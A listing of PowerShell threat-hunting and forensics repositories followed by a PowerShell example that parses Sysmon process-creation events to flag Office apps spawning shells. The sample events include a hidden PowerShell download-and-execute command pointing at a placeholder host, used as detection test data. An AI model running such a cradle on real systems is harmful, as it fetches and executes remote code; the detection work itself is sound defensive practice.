A repository of sysmon configuration modules
Updated Jul 17, 2024 - PowerShell
Advanced Sysmon ATT&CK configuration focused on detecting the most techniques per data source in MITRE ATT&CK, providing visibility into forensic artifact events for UEBA, detecting exploitation events with wide CVE coverage, and risk scoring of CVE, UEBA, forensic, and MITRE ATT&CK events.
DetectionLabELK is a fork of DetectionLab with the ELK stack instead of Splunk.
A cloud forensics PowerShell module to run threat hunting playbooks on data from Azure and O365.
Covers various security approaches to attack techniques and also presents new findings about security breaches.
Automation scripts to deploy Windows Event Forwarding, Sysmon, and custom audit policies in an Active Directory environment.
A data source assessment at the event level to show potential coverage of the MITRE ATT&CK framework.
Microsoft Sentinel SOC Operations
Gather Open-Source Intelligence using PowerShell.
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Threat Hunting with ELK Workshop (InfoSecWorld 2017)
Purple team scripts for simulation and detection: trigger events that exercise SOC detections.
PowerGRR is an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.
PowerShell script to help speed up threat hunting and incident response processes.
Collection of Remote Monitoring and Management (RMM) tool artifacts to assist forensics and investigations.
Incident response scripts.
PowerShell scripts for identifying compromised Office 365 accounts/mailboxes.
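As an added example (not code from any of the repositories listed above) of the kind of hunt these PowerShell projects build on: parse Sysmon Event ID 1 process-creation records, the data the Sysmon configuration and Windows Event Forwarding deployment repos above would collect, and flag an Office application spawning a command interpreter. The event XML is constructed sample data in the Sysmon EventData layout (two benign records, two suspicious ones); the `$officeParents` and `$shellChildren` lists, the ATT&CK mapping string, and the function names are assumptions of this example, not anything a listed project defines.

```powershell
# Added example, not from any repository on this page. Sample Sysmon EID 1
# records are constructed inline so the script runs offline; on a live host
# replace $sampleEvents with something like
#   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
#       ForEach-Object { ([xml]$_.ToXml()).Event }
# (the real events carry a default XML namespace, which PowerShell's dot
# navigation ignores, so the parsing below works unchanged).
$sampleEvents = @'
<Events>
  <Event>
    <System><EventID>1</EventID></System>
    <EventData>
      <Data Name="UtcTime">2024-07-17 10:01:02.000</Data>
      <Data Name="Image">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
      <Data Name="CommandLine">"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"</Data>
      <Data Name="User">CORP\alice</Data>
      <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>1</EventID></System>
    <EventData>
      <Data Name="UtcTime">2024-07-17 10:01:05.000</Data>
      <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
      <Data Name="CommandLine">cmd.exe /c powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"</Data>
      <Data Name="User">CORP\alice</Data>
      <Data Name="ParentImage">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>1</EventID></System>
    <EventData>
      <Data Name="UtcTime">2024-07-17 10:02:30.000</Data>
      <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
      <Data Name="CommandLine">powershell.exe -File C:\Scripts\backup.ps1</Data>
      <Data Name="User">CORP\svc_backup</Data>
      <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>1</EventID></System>
    <EventData>
      <Data Name="UtcTime">2024-07-17 10:03:11.000</Data>
      <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
      <Data Name="CommandLine">powershell.exe -w hidden -nop -c "Start-Process calc.exe"</Data>
      <Data Name="User">CORP\bob</Data>
      <Data Name="ParentImage">C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE</Data>
    </EventData>
  </Event>
</Events>
'@

# Assumed lists for this example: which parents count as "Office" and which
# children count as an interpreter. Extend them to match your environment.
$officeParents = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE')
$shellChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe')

function ConvertFrom-SysmonProcessCreate {
    # Flatten one Sysmon <Event> into an object keyed by its EventData field names.
    param([Parameter(Mandatory)][System.Xml.XmlElement]$Record)
    $fields = @{}
    foreach ($d in $Record.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        UtcTime     = $fields['UtcTime']
        Image       = $fields['Image']
        CommandLine = $fields['CommandLine']
        User        = $fields['User']
        ParentImage = $fields['ParentImage']
    }
}

function Find-OfficeSpawnedShell {
    # Emit a finding for every record whose parent is an Office binary and whose
    # child is an interpreter. Only file names are compared (case-insensitively,
    # which is what -contains does), so install-path differences between
    # 32/64-bit or Click-to-Run and MSI Office do not break the match.
    param([Parameter(Mandatory)][object[]]$ProcessEvents)
    foreach ($p in $ProcessEvents) {
        $parentName = ($p.ParentImage -split '[\\/]')[-1]
        $childName  = ($p.Image -split '[\\/]')[-1]
        if ($officeParents -contains $parentName -and $shellChildren -contains $childName) {
            [pscustomobject]@{
                UtcTime     = $p.UtcTime
                User        = $p.User
                Parent      = $parentName
                Child       = $childName
                CommandLine = $p.CommandLine
                # Assumed mapping for this example: delivery via a document, then interpreter execution.
                Technique   = 'T1566.001 Spearphishing Attachment -> T1059 Command and Scripting Interpreter'
            }
        }
    }
}

$processEvents = ([xml]$sampleEvents).Events.Event |
    Where-Object { $_.System.EventID -eq '1' } |
    ForEach-Object { ConvertFrom-SysmonProcessCreate -Record $_ }

Find-OfficeSpawnedShell -ProcessEvents $processEvents | Format-List
```

The hunt only sees what the Sysmon configuration actually logs: if process creation for the parent or child is excluded by a config rule, the ParentImage relationship never reaches the event log or the WEF collector, which is why the per-data-source coverage that the Sysmon configuration repo above emphasises matters before any rule like this is written.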